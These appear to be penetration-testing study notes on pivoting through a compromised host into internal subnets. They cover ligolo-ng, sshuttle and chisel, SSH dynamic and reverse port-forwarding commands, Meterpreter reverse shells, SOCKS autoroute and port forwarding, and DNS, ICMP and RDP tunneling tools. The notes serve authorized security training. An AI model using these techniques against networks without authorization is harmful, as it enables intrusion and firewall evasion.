# Most Common Tools - `ligolo-ng` - Admin privs not required on pivot host - No need for `proxychains4` - `sshuttle` - Only works for pivoting over SSH - No need for `proxychains4` - `chisel` - TCP/UDP-based tunneling tool written in Go that uses HTTP secured with SSH - Single binary with both client and server modes - Requires `proxychains4` ![[images/Attachment-1.png]] # Other Tools+Sequences - SSH dynamic port forwarding - `ssh -D 9050 user@<external_ip_picot_host>` - Then, prepend `proxychains4` to commands to reach a different subnet accessible to the pivot host ![[images/Pasted image 20251024092630.png]] - Remote-reverse HTTPS shell between Kali and downstream Windows host - SSH reverse port forwarding between Kali and pivot hosts - `ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ExternalIPofPivotHost> -vN` - Meterpreter reverse https session between Kali and downstream Windows host - **Note**: Useful when SSH is unavailable on a target host such as a Windows machine or when inbound connections are disabled by a FW ![[images/Pasted image 20251024092925.png]] - Reverse TCP shell between Kali and pivot hosts - MSF SOCKS proxy to internal subnet - Add SOCKS proxy server - Autoroute `meterpreter` traffic through SOCKS proxy to internal subnet using `autoroute` - Then, `proxychains4` can be appended to commands to reach a different subnet accessible to the pivot host - Single target port forwarding - Use `meterpreter` `portfdwd` module to forward, for example, RDP traffic from Kali host to a specific downstream host in the internal subnet - Single target reverse port forwarding - Use `meterpreter` reverse `portfdwd` module to forward, for example, RDP traffic from a specific downstream host in the internal subnet to Kali host # Lesser Used Tools - `socat` - bidirectional relay tool that can create pipe sockets between 2 independent network channels without SSH tunneling - works with both bind and reverse shells - `plink` - SSH dynamic port forwarding on Windows - `rpivot` - reverse SOCKS proxy tool written in python for SOCKS tunneling - `netsh` - Single target port forwarding on Windows - `dnscat2` - DNS tunneling - `ptunnel-ng` - ICMP tunneling with SOCKS - `SocksOverRDP` - RDP tunneling using dynamic virtual channels (DVCs)